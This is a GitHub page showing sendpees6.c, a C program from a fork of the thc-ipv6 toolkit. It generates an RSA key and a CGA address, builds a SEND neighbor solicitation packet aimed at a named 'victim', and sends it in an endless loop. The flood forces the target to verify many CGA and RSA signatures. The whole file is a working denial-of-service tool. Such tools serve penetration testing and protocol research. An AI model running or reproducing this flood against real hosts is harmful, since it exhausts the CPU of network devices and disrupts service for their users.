forked from vanhauser-thc/thc-ipv6
-
Notifications
You must be signed in to change notification settings - Fork 0
/
sendpees6.c
89 lines (73 loc) · 2.12 KB
/
sendpees6.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#include <stdio.h>
#include <string.h>
#ifndef _HAVE_SSL
int main() {
fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, sendpees6 disabled.\n");
return -1;
}
#else
#include <pcap.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <openssl/rsa.h>
#include "thc-ipv6.h"
int main(int argc, char **argv) {
thc_cga_hdr *cga_opt;
thc_key_t *key;
struct in6_addr addr6;
unsigned char *pkt = NULL;
unsigned char *dst6, *cga, *dev;
char dummy[24], prefix[8], addr[50];
char dsthw[] = "\xff\xff\xff\xff\xff\xff";
char srchw[] = "\xdd\xde\xad\xbe\xef\xff";
int pkt_len = 0;
if (argc != 5) {
printf("sendpees6 by willdamn <willdamn@gmail.com>\n\n");
printf("Syntax: %s interface key_length prefix victim\n\n", argv[0]);
printf("Send SEND neighbor solicitation messages and make target to verify a lota CGA and RSA signatures\n\n");
exit(1);
}
dev = argv[1];
if (thc_get_own_ipv6(dev, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", dev);
exit(-1);
}
memcpy(addr, argv[3], 50);
inet_pton(PF_INET6, addr, &addr6);
memcpy(prefix, &addr6, 8);
key = thc_generate_key(atoi(argv[2]));
if (key == NULL) {
printf("Couldn't generate key!");
exit(1);
}
cga_opt = thc_generate_cga(prefix, key, &cga);
if (cga_opt == NULL) {
printf("Error during CGA generation");
exit(1);
}
dst6 = thc_resolve6(argv[4]);
memset(dummy, 'X', sizeof(dummy));
dummy[16] = 1;
dummy[17] = 1;
memcpy(dummy, dst6, 16);
if ((pkt = thc_create_ipv6_extended(dev, PREFER_GLOBAL, &pkt_len, cga, dst6, 0, 0, 0, 0, 0)) == NULL) {
printf("Cannot create IPv6 header\n");
exit(1);
}
if (thc_add_send(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0xfacebabe, 0x0, dummy, 24, cga_opt, key, NULL, 0) < 0) {
printf("Cannot add SEND options\n");
exit(1);
}
free(cga_opt);
if (thc_generate_pkt(dev, srchw, dsthw, pkt, &pkt_len) < 0) {
fprintf(stderr, "Couldn't generate IPv6 packet!\n");
exit(1);
}
printf("Sending...");
fflush(stdout);
while (1)
thc_send_pkt(dev, pkt, &pkt_len);
return 0;
}
#endif